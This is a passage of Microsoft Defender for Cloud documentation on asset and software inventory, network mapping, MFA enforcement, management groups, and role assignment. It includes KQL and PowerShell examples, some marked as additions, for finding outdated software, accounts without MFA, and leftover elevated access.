unhealthy resources), the Recommendations filter will have no options. 


[Screenshot: the Inventory page with filters applied (Subscriptions, Resource Groups, Resource types, Defender for Cloud, Monitoring agent, Environment), the summary strip, and the paged resource list.] 


3. To use the Security findings contain filter, enter free text from the ID, security 
check, or CVE name of a vulnerability finding to filter to the affected resources: 


[Screenshot: the details page of the recommendation "Vulnerabilities in Azure Container Registry images should be remediated", with the Security Checks tab listing findings such as 176875 Debian Security Update for systemd (CVE-2018-1049, CVE-2018-15686) together with their remediation links.] 


Tip 


The Security findings contain and Tags filters only accept a single value. To 
filter by more than one, use Add filters. 


4. To use the Defender for Cloud filter, select one or more options (Off, On, or 
Partial): 


• Off - Resources not protected by a Microsoft Defender plan. You can right-click 
on the resources and upgrade them: 


[Screenshot: the inventory list with the right-click menu open on a virtual machine, showing the View resource and Upgrade options.] 


• On - Resources protected by a Microsoft Defender plan 


• Partial - Subscriptions with some but not all of the Microsoft Defender plans 
disabled. For example, the following subscription has seven Microsoft 
Defender plans disabled. 


[Screenshot: the Settings | Defender plans page for the subscription Contoso Infra2, listing the plans by resource type (Servers, App Service, Azure SQL Databases, SQL servers on machines, Open-source relational databases, Storage, Kubernetes, Container registries, Key Vault, Resource Manager, DNS) with several of them set to Off.] 


5. To further examine the results of your query, select the resources that interest you. 


6. To view the current selected filter options as a query in Resource Graph Explorer, 
select Open query. 


[Screenshot: Azure Resource Graph Explorer opened from Open query, showing the generated query over securityresources of type microsoft.security/assessments.] 


7. If you've defined some filters and left the page open, Defender for Cloud won't 
update the results automatically. Any changes to resources won't impact the 
displayed results unless you manually reload the page or select Refresh. 


Access a software inventory 


To access the software inventory, you'll need one of the following paid solutions: 


• Agentless machine scanning from Defender Cloud Security Posture Management 
(CSPM). 

• Agentless machine scanning from Defender for Servers P2. 

• Microsoft Defender for Endpoint integration from Defender for Servers. 


If you've already enabled the integration with Microsoft Defender for Endpoint and 
enabled Microsoft Defender for Servers, you'll have access to the software inventory. 


[Screenshot: the Inventory page with the Installed applications filter added alongside the other filters, listing virtual machines with their Monitoring agent status (Installed or Not installed).] 


Note 
The "Blank" option shows machines without Microsoft Defender for Endpoint or 
without Microsoft Defender for Servers. 

Besides the filters in the asset inventory page, you can explore the software inventory 
data from Azure Resource Graph Explorer. 


Examples of using Azure Resource Graph Explorer to access and explore software 
inventory data: 


1. Open Azure Resource Graph Explorer. 


[Screenshot: searching for Resource Graph Explorer in the Azure portal search box.] 


2. Select the following subscription scope: securityresources/softwareinventories 


3. Enter any of the following queries (or customize them or write your own!) and 
select Run query. 


• To generate a basic list of installed software: 

  Kusto 

  securityresources 
  | where type == "microsoft.security/softwareinventories" 
  | project id, Vendor=properties.vendor, Software=properties.softwareName, Version=properties.version 


• To filter by version numbers: 

  Kusto 

  securityresources 
  | where type == "microsoft.security/softwareinventories" 
  | project id, Vendor=properties.vendor, Software=properties.softwareName, Version=tostring(properties.version) 
  // parse_version() compares version strings numerically, part by part 
  | where Software=="windows_server_2019" and parse_version(Version)<=parse_version("10.0.17763.1999") 


• To find machines with a combination of software products: 

  Kusto 

  securityresources 
  | where type == "microsoft.security/softwareinventories" 
  | extend vmId = properties.azureVmId 
  | where properties.softwareName == "apache_http_server" or properties.softwareName == "mysql" 
  // one row per machine; count_ > 1 means both products were found on it 
  | summarize count() by tostring(vmId) 
  | where count_ > 1 


• Combination of a software product with another security recommendation (in this 
example, machines that have MySQL installed and exposed management ports): 

  Kusto 

  securityresources 
  | where type == "microsoft.security/softwareinventories" 
  | extend vmId = tolower(tostring(properties.azureVmId)) 
  | where properties.softwareName == "mysql" 
  // join on the lowercased VM resource ID shared by both record types 
  | join ( 
      securityresources 
      | where type == "microsoft.security/assessments" 
      | where properties.displayName == "Management ports should be closed on your virtual machines" and properties.status.code == "Unhealthy" 
      | extend vmId = tolower(tostring(properties.resourceDetails.Id)) 
  ) on vmId 
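The following query is an added example, not part of this article, that combines the patterns shown above and the asset inventory questions raised earlier (the "How does asset inventory work?" section): for every machine in one resource group it lists the installed software that is below a minimum patched version, then joins the machine's open (Unhealthy) Defender for Cloud assessments so that outdated software on an already exposed machine is ranked first. The resource group name "rg-prod", the product names and the version thresholds are constructed placeholders; the query assumes the standard Azure Resource Graph `resourceGroup` column is present on `securityresources` rows and otherwise uses only the properties this article shows.

```kusto
// Added example (not from the article): software below a minimum patched version,
// per machine in one resource group, joined with each machine's unhealthy assessments.
// "rg-prod", the product names and the version thresholds are constructed placeholders.
let targetResourceGroup = "rg-prod";
securityresources
| where type == "microsoft.security/softwareinventories"
| where resourceGroup =~ targetResourceGroup          // standard ARG column (assumed present)
| extend vmId = tolower(tostring(properties.azureVmId)),
         Software = tostring(properties.softwareName),
         Version = tostring(properties.version)
// Minimum patched version per product; products not listed fall through with an empty string.
| extend MinVersion = case(
      Software == "openssl", "3.0.10",
      Software == "apache_http_server", "2.4.57",
      Software == "mysql", "8.0.33",
      "")
| where isnotempty(MinVersion) and parse_version(Version) < parse_version(MinVersion)
| summarize OutdatedSoftware = make_set(strcat(Software, " ", Version)) by vmId
// Bring in the machine's open recommendations, using the same join key as the article's examples.
| join kind=leftouter (
      securityresources
      | where type == "microsoft.security/assessments"
      | where properties.status.code == "Unhealthy"
      | extend vmId = tolower(tostring(properties.resourceDetails.Id)),
               severity = tolower(tostring(properties.metadata.severity))
      | summarize UnhealthyAssessments = make_set(tostring(properties.displayName)),
                  HighSeverityCount = countif(severity == "high") by vmId
  ) on vmId
| project vmId, OutdatedSoftware, HighSeverityCount, UnhealthyAssessments
| order by HighSeverityCount desc
```

The join is `leftouter` rather than the plain inner join used in the article's MySQL example, so a machine whose outdated software has no open recommendation still appears, with empty assessment columns; that is usually the row worth a second look, because the software inventory has found something the recommendation engine has not yet flagged.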


Next steps 


This article described the asset inventory page of Microsoft Defender for Cloud. 
For more information on related tools, see the following pages: 


• Azure Resource Graph (ARG) 
• Kusto Query Language (KQL) 
• View common questions about asset inventory 


Protect your network resources 


Article e 04/18/2023 


Microsoft Defender for Cloud continuously analyzes the security state of your Azure 
resources for network security best practices. When Defender for Cloud identifies 
potential security vulnerabilities, it creates recommendations that guide you through the 
process of configuring the needed controls to harden and protect your resources. 


For a full list of the recommendations for Networking, see Networking 
recommendations. 


This article addresses recommendations that apply to your Azure resources from a 
network security perspective. Networking recommendations center around next 
generation firewalls, Network Security Groups, JIT VM access, overly permissive inbound 
traffic rules, and more. For a list of networking recommendations and remediation 
actions, see Managing security recommendations in Microsoft Defender for Cloud. 


The Networking features of Defender for Cloud include: 


• Network map (requires Microsoft Defender for Servers Plan 2) 
• Adaptive network hardening (requires Microsoft Defender for Servers Plan 2) 
• Networking security recommendations 


View your networking resources and their 
recommendations 


From the asset inventory page, use the resource type filter to select the networking 
resources that you want to investigate: 


[Screenshot: the Inventory page with the Resource type filter open, showing networking types such as local network gateways, network interfaces, network security groups, network security rules, and virtual network gateways.] 


Network map 


The interactive network map provides a graphical view with security overlays giving you 
recommendations and insights for hardening your network resources. Using the map 
you can see the network topology of your Azure workloads, connections between your 
virtual machines and subnets, and the capability to drill down from the map into specific 
resources and the recommendations for those resources. 


To open the Network map: 

1. From Defender for Cloud's menu, open the Workload protections dashboard. 

2. Select Network map. 

3. From the Layers menu, choose Topology. 


The default view of the topology map displays: 


[Screenshot: the Network map in its default Topology view.] 


• Currently selected subscriptions - The map is optimized for the subscriptions you 
selected in the portal. If you modify your selection, the map is regenerated with 
the new selections. 

• VMs, subnets, and VNets of the Resource Manager resource type ("classic" Azure 
resources are not supported) 

• Peered VNets 

• Only resources that have network recommendations with a high or medium 
severity 

• Internet-facing resources 


Understanding the network map 


The network map can show you your Azure resources in a Topology view and a Traffic 
view. 


The topology view 


In the Topology view of the networking map, you can view the following insights about 
your networking resources: 


• In the inner circle, you can see all the VNets within your selected subscriptions, the 
next circle is all the subnets, the outer circle is all the virtual machines. 

• The lines connecting the resources in the map let you know which resources are 
associated with each other, and how your Azure network is structured. 

• Use the severity indicators to quickly get an overview of which resources have 
open recommendations from Defender for Cloud. 

• You can click any of the resources to drill down into them and view the details of 
that resource and its recommendations directly, and in the context of the Network 
map. 

• If there are too many resources being displayed on the map, Microsoft Defender 
for Cloud uses its proprietary algorithm to 'smart cluster' your resources, 
highlighting the ones that are in the most critical state, and have the most high 
severity recommendations. 


Because the map is interactive and dynamic, every node is clickable, and the view can 
change based on the filters: 


1. You can modify what you see on the network map by using the filters at the top. 
You can focus the map based on: 


• Security health: You can filter the map based on Severity (High, Medium, 
Low) of your Azure resources. 

• Recommendations: You can select which resources are displayed based on 
which recommendations are active on those resources. For example, you can 
view only resources for which Defender for Cloud recommends you enable 
Network Security Groups. 

• Network zones: By default, the map displays only Internet facing resources; 
you can select internal VMs as well. 


2. You can click Reset in the top left corner at any time to return the map to its default 
state. 


To drill down into a resource: 


1. When you select a specific resource on the map, the right pane opens and gives 
you general information about the resource, connected security solutions if there 
are any, and the recommendations relevant to the resource. It's the same type of 
behavior for each type of resource you select. 

2. When you hover over a node in the map, you can view general information about 
the resource, including subscription, resource type, and resource group. 

3. Use the link to zoom into the tool tip and refocus the map on that specific node. 

4. To refocus the map away from a specific node, zoom out. 


The Traffic view 


The Traffic view provides you with a map of all the possible traffic between your 
resources. This provides you with a visual map of all the rules you configured that define 
which resources can communicate with whom. This enables you to see the existing 
configuration of the network security groups as well as quickly identify possible risky 
configurations within your workloads. 


Uncover unwanted connections 


The strength of this view is in its ability to show you these allowed connections together 
with the vulnerabilities that exist, so you can use this cross-section of data to perform 
the necessary hardening on your resources. 


For example, you might detect two machines that you weren't aware could 
communicate, enabling you to better isolate the workloads and subnets. 


Investigate resources 
To drill down into a resource: 


1. When you select a specific resource on the map, the right pane opens and gives 
you general information about the resource, connected security solutions if there 
are any, and the recommendations relevant to the resource. It's the same type of 
behavior for each type of resource you select. 

2. Click Traffic to see the list of possible outbound and inbound traffic on the 
resource - this is a comprehensive list of who can communicate with the resource 
and who it can communicate with, and through which protocols and ports. For 
example, when you select a VM, all the VMs it can communicate with are shown, 
and when you select a subnet, all the subnets which it can communicate with are 
shown. 


This data is based on analysis of the Network Security Groups as well as advanced 
machine learning algorithms that analyze multiple rules to understand their 
crossovers and interactions. 
Next steps 


To learn more about recommendations that apply to other Azure resource types, see the 
following: 


• Protecting your machines and applications in Microsoft Defender for Cloud 


Manage multifactor authentication 
(MFA) on your subscriptions 
If you're using passwords only to authenticate your users, you're leaving an attack vector 
open. Users often use weak passwords or reuse them for multiple services. With MFA 
enabled, your accounts are more secure, and users can still authenticate to almost any 
application with single sign-on (SSO). 


There are multiple ways to enable MFA for your Microsoft Entra users based on the 
licenses that your organization owns. This page provides the details for each in the 
context of Microsoft Defender for Cloud. 


MFA and Microsoft Defender for Cloud 


Defender for Cloud places a high value on MFA. The security control that contributes the 
most to your secure score is Enable MFA. 


The following recommendations in the Enable MFA control ensure you're meeting the 
recommended practices for users of your subscriptions: 


• Accounts with owner permissions on Azure resources should be MFA enabled 
• Accounts with write permissions on Azure resources should be MFA enabled 
• Accounts with read permissions on Azure resources should be MFA enabled 


There are three ways to enable MFA and be compliant with the two recommendations in 
Defender for Cloud: security defaults, per-user assignment, and conditional access (CA) 
policy. 


Free option - security defaults 


If you're using the free edition of Microsoft Entra ID, you should use the security 
defaults to enable multifactor authentication on your tenant. 


MFA for Microsoft 365 Business, E3, or E5 customers 


Customers with Microsoft 365 can use Per-user assignment. In this scenario, Microsoft 
Entra multifactor authentication is either enabled or disabled for all users, for all sign-in 
events. There's no ability to enable multifactor authentication for a subset of users, or 
under certain scenarios, and management is through the Office 365 portal. 


MFA for Microsoft Entra ID P1 or P2 customers 


For an improved user experience, upgrade to Microsoft Entra ID P1 or P2 for conditional 
access (CA) policy options. To configure a CA policy, you need Microsoft Entra tenant 
permissions. 


Your CA policy must: 

• enforce MFA 

• include the Microsoft Azure Management app ID (797f4846-ba00-4fd7-ba43-
dac1f8f63013) or all apps 

• not exclude the Microsoft Azure Management app ID 


Microsoft Entra ID P1 customers can use Microsoft Entra CA to prompt users for 
multifactor authentication during certain scenarios or events to fit your business 
requirements. Other licenses that include this functionality: Enterprise Mobility + 
Security E3, Microsoft 365 F1, and Microsoft 365 E3. 


Microsoft Entra ID P2 provides the strongest security features and an improved user 
experience. This license adds risk-based conditional access to the Microsoft Entra ID P1 
features. Risk-based CA adapts to your users’ patterns and minimizes multifactor 
authentication prompts. Other licenses that include this functionality: Enterprise Mobility 
+ Security E5 or Microsoft 365 E5. 


Learn more in the Azure Conditional Access documentation. 


Identify accounts without multifactor 
authentication (MFA) enabled 


You can view the list of user accounts without MFA enabled from either the Defender for 
Cloud recommendations details page, or by using the Azure Resource Graph. 


View the accounts without MFA enabled in the Azure 
portal 


From the recommendation details page, select a subscription from the Unhealthy 
resources list or select Take action and the list will be displayed. 


View the accounts without MFA enabled using Azure 
Resource Graph 


To see which accounts don't have MFA enabled, use the following Azure Resource Graph 
query. The query returns all unhealthy resources - accounts - of the recommendation 
"Accounts with owner permissions on Azure resources should be MFA enabled". 


1. Open Azure Resource Graph Explorer. 


[Screenshot: searching for Resource Graph Explorer in the Azure portal search box.] 


2. Enter the following query and select Run query. 


securityresources 
| where type =~ "microsoft.security/assessments/subassessments" 
// the three Enable MFA recommendations (owner, write and read permissions) 
| where id has "assessments/dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c" or id 
  has "assessments/c0cb17b2-0607-48a7-b0e0-903ed22de39b" or id has 
  "assessments/6240402e-f77c-46fa-9060-a7ce53997754" 
// the assessment ID and the account object ID are both part of the resource ID 
| parse id with start "/assessments/" assessmentId "/subassessments/" userObjectId 
| summarize make_list(userObjectId) by strcat(tostring(properties.displayName), " (", assessmentId, ")") 
| project ["Recommendation Name"] = Column1 , ["Account ObjectIDs"] = list_userObjectId 


3. The additionalData property reveals the list of account object IDs for accounts 
that don't have MFA enforced. 


Note 


The ‘Account ObjectIDs' column contains the list of account object IDs for 
accounts that don't have MFA enforced per recommendation. 
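As an added example that is not part of this article, the following query builds on the one above to count, per subscription and per permission level, the accounts that the three Enable MFA recommendations flag, which is the shape a practitioner needs to prioritise remediation across many subscriptions. It maps each assessment ID to its permission level using the IDs listed in the query above; `subscriptionId` is assumed to be present as the standard Azure Resource Graph column.

```kusto
// Added example (not from the article): accounts flagged by the three Enable MFA
// recommendations, counted per subscription and per permission level.
securityresources
| where type =~ "microsoft.security/assessments/subassessments"
| where id has "assessments/dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c"     // owner permissions
     or id has "assessments/c0cb17b2-0607-48a7-b0e0-903ed22de39b"     // write permissions
     or id has "assessments/6240402e-f77c-46fa-9060-a7ce53997754"     // read permissions
// Same parse pattern as the query above: the assessment ID and the account
// object ID are both part of the subassessment resource ID.
| parse id with start "/assessments/" assessmentId "/subassessments/" userObjectId
| extend permissionLevel = case(
      assessmentId =~ "dabc9bc4-b8a8-45bd-9a5a-43000df8aa1c", "owner",
      assessmentId =~ "c0cb17b2-0607-48a7-b0e0-903ed22de39b", "write",
      "read")
// subscriptionId is the standard ARG column (assumed present on these rows).
| summarize AccountsWithoutMfa = dcount(userObjectId),
            AccountObjectIds = make_set(userObjectId) by subscriptionId, permissionLevel
| order by AccountsWithoutMfa desc, permissionLevel asc
```

Owner-level accounts without MFA carry the most risk, so when the counts are similar across subscriptions, read the `permissionLevel` column before the totals; the object IDs in `AccountObjectIds` can then be resolved against Microsoft Entra ID to find the owners to contact.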


Tip 


Alternatively, you can use the Defender for Cloud REST API method 
Assessments - Get. 


Limitations 


• Conditional Access feature to enforce MFA on external users/tenants isn't 
supported yet. 

• Conditional Access policy applied to Microsoft Entra roles (such as all global 
admins, external users, external domain, etc.) isn't supported yet. 

• External MFA solutions such as Okta, Ping, Duo, and more aren't supported within 
the identity MFA recommendations. 


Next steps 


To learn more about recommendations that apply to other Azure resource types, see the 
following articles: 


• Protecting your network in Microsoft Defender for Cloud 
• Check out common questions about MFA. 


Other threat protections in Microsoft 
Defender for Cloud 
In addition to its built-in advanced protection plans, Microsoft Defender for Cloud also 
offers the following threat protection capabilities. 


Tip 


To enable Defender for Cloud's threat protection capabilities, you must enable 
enhanced security features on the subscription containing the applicable 
workloads. 


Threat protection for Azure network layer 


Defender for Cloud's network-layer analytics are based on sample IPFIX data, which 
are packet headers collected by Azure core routers. Based on this data feed, Defender 
for Cloud uses machine learning models to identify and flag malicious traffic activities. 
Defender for Cloud also uses the Microsoft Threat Intelligence database to enrich IP 
addresses. 


Some network configurations restrict Defender for Cloud from generating alerts on 
suspicious network activity. For Defender for Cloud to generate network alerts, ensure 
that: 


• Your virtual machine has a public IP address (or is on a load balancer with a public 
IP address). 

• Your virtual machine's network egress traffic isn't blocked by an external IDS 
solution. 


For a list of the Azure network layer alerts, see the Reference table of alerts. 


Stream security alerts from other Microsoft 
services 


Display Azure WAF alerts in Defender for Cloud 


Azure Application Gateway offers a web application firewall (WAF) that provides 
centralized protection of your web applications from common exploits and 
vulnerabilities. 


Web applications are increasingly targeted by malicious attacks that exploit commonly 
known vulnerabilities. The Application Gateway WAF is based on Core Rule Set 3.0 or 
2.2.9 from the Open Web Application Security Project. The WAF is updated automatically 
to protect against new vulnerabilities. 


If you have created WAF Security solution, your WAF alerts are streamed to Defender for 
Cloud with no other configurations. For more information on the alerts generated by 
WAF, see Web application firewall CRS rule groups and rules. 


Note 


Only WAF v1 is supported and will work with Microsoft Defender for Cloud. 


To deploy Azure's Application Gateway WAF, do the following: 
1. From the Azure portal, open Defender for Cloud. 
2. From Defender for Cloud's menu, select Security solutions. 


3. In the Add data sources section, select Add for Azure's Application Gateway WAF. 


[Screenshot: the Security solutions page in Defender for Cloud, showing Connected solutions (for example a next generation firewall, a web application firewall, and a vulnerability assessment solution) with their health status, and the Add data sources section listing Non-Azure servers, SIEM, and Azure Application Gateway WAF.] 


Display Azure DDoS Protection alerts in Defender for 
Cloud 


Distributed denial of service (DDoS) attacks are known to be easy to execute. They've 
become a great security concern, particularly if you're moving your applications to the 
cloud. A DDoS attack attempts to exhaust an application's resources, making the 
application unavailable to legitimate users. DDoS attacks can target any endpoint that 
can be reached through the internet. 


To defend against DDoS attacks, purchase a license for Azure DDoS Protection and 
ensure you're following application design best practices. DDoS Protection provides 
different service tiers. For more information, see Azure DDoS Protection overview. 


If you have Azure DDoS Protection enabled, your DDoS alerts are streamed to Defender 
for Cloud with no other configuration needed. For more information on the alerts 
generated by DDoS Protection, see Reference table of alerts. 


Microsoft Entra Permissions Management 
(formerly Cloudknox) 


Microsoft Entra Permissions Management is a cloud infrastructure entitlement management (CIEM) solution. Microsoft Entra Permissions Management provides comprehensive visibility and control over permissions for any identity and any resource in Azure, AWS, and GCP.


As part of the integration, each onboarded Azure subscription, AWS account, and GCP project gives you a view of your Permission Creep Index (PCI). The PCI is an aggregated metric that periodically evaluates the level of risk associated with the number of unused or excessive permissions across identities and resources. PCI measures how risky identities can potentially be, based on the permissions available to them.
Next steps


To learn more about the security alerts from these threat protection features, see the following articles:


- Reference table for all Defender for Cloud alerts
- Security alerts in Defender for Cloud
- Manage and respond to security alerts in Defender for Cloud
- Continuously export Defender for Cloud data


Organize subscriptions into management groups and assign roles to users


Manage your organization's security posture at scale by applying security policies to all Azure subscriptions linked to your Microsoft Entra tenant.


For visibility into the security posture of all subscriptions linked to a Microsoft Entra 
tenant, you'll need an Azure role with sufficient read permissions assigned on the root 
management group. 


Organize your subscriptions into management groups


Overview of management groups 


Use management groups to efficiently manage access, policies, and reporting on groups 
of subscriptions, and effectively manage the entire Azure estate by performing actions 
on the root management group. You can organize subscriptions into management 
groups and apply your governance policies to the management groups. All 
subscriptions within a management group automatically inherit the policies applied to 
the management group. 


Each Microsoft Entra tenant is given a single top-level management group called the 
root management group. This root management group is built into the hierarchy to 
have all management groups and subscriptions fold up to it. This group allows global 
policies and Azure role assignments to be applied at the directory level. 


The root management group is created automatically when you do any of the following 
actions: 


- In the Azure portal, select Management Groups.
- Create a management group with an API call.
- Create a management group with PowerShell. For PowerShell instructions, see Create management groups for resource and organization management.


Management groups aren't required to onboard Defender for Cloud, but we 
recommend creating at least one so that the root management group gets created. 


After the group is created, all subscriptions under your Microsoft Entra tenant will be 
linked to it. 


For a detailed overview of management groups, see the Organize your resources with 
Azure management groups article. 


View and create management groups in the Azure portal
1. Sign in to the Azure portal.
2. Search for and select Management Groups.
3. To create a management group, select Create, enter the relevant details, and select Submit.
   - The Management Group ID is the directory unique identifier that is used to submit commands on this management group. This identifier isn't editable after creation as it is used throughout the Azure system to identify this group.
   - The display name field is the name that is displayed within the Azure portal. A separate display name is an optional field when creating the management group and can be changed at any time.


Add subscriptions to a management group
You can add subscriptions to the management group that you created.
1. Sign in to the Azure portal.
2. Search for and select Management Groups.
3. Select the management group for your subscription.
4. When the group's page opens, select Subscriptions.
5. From the subscriptions page, select Add, then select your subscriptions and select Save. Repeat until you've added all the subscriptions in the scope.


Important


Management groups can contain both subscriptions and child management groups. When you assign a user an Azure role to the parent management group, the access is inherited by the child management group's subscriptions. Policies set at the parent management group are also inherited by the children.


Assign Azure roles to other users


Assign Azure roles to users through the Azure portal:
1. Sign in to the Azure portal.
2. Search for and select Management Groups.
3. Select the relevant management group.
4. Select Access control (IAM), open the Role assignments tab and select Add > Add role assignment.
5. From the Add role assignment page, select the relevant role.

[Screenshot: Add role assignment page, Role tab, listing built-in roles such as Owner, Contributor and Reader with their descriptions.]

6. From the Members tab, select + Select members and assign the role to the relevant members.
7. On the Review + assign tab, select Review + assign to assign the role.


Assign Azure roles to users with PowerShell:
1. Install Azure PowerShell.
2. Run the following commands:
Azure PowerShell


# Login to Azure as a Global Administrator user
Connect-AzAccount


3. When prompted, sign in with global admin credentials.

[Screenshot: Microsoft Azure sign-in dialog.]

4. Grant reader role permissions by running the following command:
Azure PowerShell


# Add Reader role to the required user on the Root Management Group
# Replace "user@domain.com" with the user to grant access to
New-AzRoleAssignment -SignInName "user@domain.com" -RoleDefinitionName "Reader" -Scope "/"


5. To remove the role, use the following command:
Azure PowerShell


Remove-AzRoleAssignment -SignInName "user@domain.com" -RoleDefinitionName "Reader" -Scope "/"


Remove elevated access


Once the Azure roles have been assigned to the users, the tenant administrator should remove themselves from the User Access Administrator role.


1. Sign in to the Azure portal.
2. In the navigation list, select Microsoft Entra ID and then select Properties.
3. Under Access management for Azure resources, set the switch to No.
4. To save your setting, select Save.
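As an added check that is not part of the Microsoft article: after the assignments above, this PowerShell (Az.Accounts and Az.Resources, already signed in with Connect-AzAccount) lists every role assigned directly on the root management group and flags any User Access Administrator assignment left behind by elevated access. The $privilegedRoles list and the two function names are this example's own.

```powershell
# Added example, not from the Microsoft documentation.
# Assumes Az.Accounts and Az.Resources are installed and Connect-AzAccount has run
# as a user who can read role assignments at the root management group ("/").

# Roles that grant tenant-wide control. A User Access Administrator assignment at
# "/" is what "Access management for Azure resources" = Yes leaves behind, so it
# should be gone once the tenant administrator has switched it back to No.
$privilegedRoles = @('Owner', 'User Access Administrator')

function Get-RootScopeRoleAssignments {
    # Keep only assignments whose own scope is exactly the root, not entries the
    # cmdlet may list for other reasons (inherited or expanded results).
    Get-AzRoleAssignment -Scope '/' | Where-Object { $_.Scope -eq '/' }
}

function ConvertTo-RootScopeReport {
    param([Parameter(Mandatory)] [AllowEmptyCollection()] [object[]] $Assignments)

    foreach ($a in $Assignments) {
        # Users carry a SignInName; groups and service principals only a DisplayName.
        $principal = if ($a.SignInName) { $a.SignInName } else { $a.DisplayName }
        [pscustomobject]@{
            Principal  = $principal
            ObjectType = $a.ObjectType          # User, Group or ServicePrincipal
            Role       = $a.RoleDefinitionName
            Privileged = $privilegedRoles -contains $a.RoleDefinitionName
            Scope      = $a.Scope
        }
    }
}

$report = @(ConvertTo-RootScopeReport -Assignments @(Get-RootScopeRoleAssignments))
$report | Sort-Object Privileged -Descending | Format-Table -AutoSize

# The specific leftover that the "Remove elevated access" steps are meant to clear.
$elevated = @($report | Where-Object { $_.Role -eq 'User Access Administrator' })
if ($elevated.Count -gt 0) {
    Write-Warning ("User Access Administrator is still assigned at '/' to: {0}" -f ($elevated.Principal -join ', '))
    Write-Warning "Set 'Access management for Azure resources' back to No, or run: Remove-AzRoleAssignment -SignInName <upn> -RoleDefinitionName 'User Access Administrator' -Scope '/'"
} else {
    Write-Host 'No User Access Administrator assignment remains on the root management group.'
}
```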


Next steps 


On this page, you learned how to organize subscriptions into management groups and 
assign roles to users. For related information, see: 


- Permissions in Microsoft Defender for Cloud


Grant and request tenant-wide visibility


A user with the Microsoft Entra role of Global Administrator might have tenant-wide responsibilities, but lack the Azure permissions to view that organization-wide information in Microsoft Defender for Cloud. Permission elevation is required because Microsoft Entra role assignments don't grant access to Azure resources.


Grant tenant-wide permissions to yourself 


To assign yourself tenant-level permissions:


1. If your organization manages resource access with Microsoft Entra Privileged Identity Management (PIM), or any other PIM tool, the global administrator role must be active for the user.
2. As a Global Administrator user without an assignment on the root management group of the tenant, open Defender for Cloud's Overview page and select the tenant-wide visibility link in the banner.

[Screenshot: Defender for Cloud Overview page with the tenant-wide visibility banner.]

3. Select the new Azure role to be assigned.

[Screenshot: role selection dialog with a link to learn more about Microsoft Defender for Cloud's roles and permissions.]


Tip


Generally, the Security Admin role is required to apply policies on the root 
level, while Security Reader will suffice to provide tenant-level visibility. For 
more information about the permissions granted by these roles, see the 
Security Admin built-in role description or the Security Reader built-in role 
description. 


For differences between these roles specific to Defender for Cloud, see the 
table in Roles and allowed actions. 
The organizational-wide view is achieved by granting roles on the root 
management group level of the tenant. 


4. Sign out of the Azure portal, and then log back in again. 


5. Once you have elevated access, open or refresh Microsoft Defender for Cloud to 
verify you have visibility into all subscriptions under your Microsoft Entra tenant. 


The process of assigning yourself tenant-level permissions performs many operations automatically for you:


- The user's permissions are temporarily elevated.
- Utilizing the new permissions, the user is assigned to the desired Azure RBAC role on the root management group.
- The elevated permissions are removed.


For more information on the Microsoft Entra elevation process, see Elevate access to manage all Azure subscriptions and management groups.


Request tenant-wide permissions when yours are insufficient


When you navigate to Defender for Cloud, you may see a banner that alerts you to the fact that your view is limited. If you see this banner, select it to send a request to the global administrator for your organization. In the request, you can include the role you'd like to be assigned and the global administrator will make a decision about which role to grant.


It's the global administrator's decision whether to accept or reject these requests.


Important


You can only submit one request every seven days.


To request elevated permissions from your global administrator:
1. From the Azure portal, open Microsoft Defender for Cloud.
2. If the banner "You're seeing limited information." is present, select it.

[Screenshot: Defender for Cloud menu (Security policy, Security solutions, Coverage, Cloud connectors) with the "You're seeing limited information." banner.]

3. In the detailed request form, select the desired role and the justification for why you need these permissions.

[Screenshot: "Request tenant-level permissions" form for the CoreCisoTenant tenant, showing the requesting user, a Desired Role choice of Security Reader or Security Admin, a Justification field and a Request access button.]


4. Select Request access. 


An email is sent to the global administrator. The email contains a link to Defender 
for Cloud where they can approve or reject the request. 


[Screenshot: email to the global administrator titled "Action required: Review a request for root management group permissions", listing the requesting user, the requested role (Security Reader), the tenant and the justification, with a "Review the request" link.]


After the global administrator selects Review the request and completes the process, the decision is emailed to the requesting user.


Next steps 


Learn more about Defender for Cloud permissions in the following related page: 


- Permissions in Microsoft Defender for Cloud


Enable Defender for Cloud on all subscriptions in a management group


Article • 02/27/2023


You can use Azure Policy to enable Microsoft Defender for Cloud on all the Azure subscriptions within the same management group (MG). This is more convenient than accessing them individually from the portal, and works even if the subscriptions belong to different owners.


Prerequisites 


Enable the resource provider _Microsoft.Security_ for the management group using the following Azure CLI command:


Azure CLI 


az provider register --namespace Microsoft.Security --management-group-id ... 


Onboard a management group and all its subscriptions


To onboard a management group and all its subscriptions:


1. As a user with Security Admin permissions, open Azure Policy and search for the definition Enable Microsoft Defender for Cloud on your subscription.

[Screenshot: Azure Policy Definitions page, searching for "Enable Microsoft Defender for Cloud".]


2. Select Assign and ensure you set the scope to the MG level. 


[Screenshot: the "Enable Microsoft Defender for Cloud on your subscription" policy definition page with the Assign button.]


Tip


Other than the scope, there are no required parameters.


3. Select Remediation, and select Create a remediation task to ensure that all existing subscriptions that don't have Defender for Cloud enabled will get onboarded.

[Screenshot: Assign policy page, Remediation tab, with "Create a remediation task" selected for the policy "Enable Microsoft Defender for Cloud on your subscription".]


4. Select Review + create. 
5. Review your information and select Create. 


When the definition is assigned, it will: 


- Detect all subscriptions in the MG that aren't yet registered with Defender for Cloud.
- Mark those subscriptions as "non-compliant".
- Mark as "compliant" all registered subscriptions (regardless of whether they have Defender for Cloud's enhanced security features on or off).


The remediation task will then enable Defender for Cloud's basic functionality on the 
non-compliant subscriptions. 


Optional modifications 


There are various ways you might choose to modify the Azure Policy definition: 


- Define compliance differently - The supplied policy classifies all subscriptions in the MG that aren't yet registered with Defender for Cloud as "non-compliant". You might choose to set it to all subscriptions without Defender for Cloud's enhanced security features enabled.

  The supplied definition treats either of the 'pricing' settings below as compliant, meaning that a subscription set to 'standard' or 'free' is compliant.

  Tip

  When any Microsoft Defender plan is enabled, it's described in a policy definition as being on the 'Standard' setting. When it's disabled, it's 'Free'. To learn about the differences between these plans, see Microsoft Defender for Cloud's Defender plans.


  "existenceCondition": {
      "anyOf": [
          {
              "field": "microsoft.security/pricings/pricingTier",
              "equals": "standard"
          },
          {
              "field": "microsoft.security/pricings/pricingTier",
              "equals": "free"
          }
      ]
  }

  If you change it to the following, only subscriptions set to 'standard' would be classified as compliant:

  "existenceCondition": {
      "field": "microsoft.security/pricings/pricingTier",
      "equals": "standard"
  }


- Define some Microsoft Defender plans to apply when enabling Defender for Cloud - The supplied policy enables Defender for Cloud without any of the optional enhanced security features. You might choose to enable one or more of the Microsoft Defender plans.

  The supplied definition's deployment section has a parameter pricingTier. By default, this is set to free, but you can modify it.


Next steps: 


Now that you've onboarded an entire management group, enable the enhanced security features.


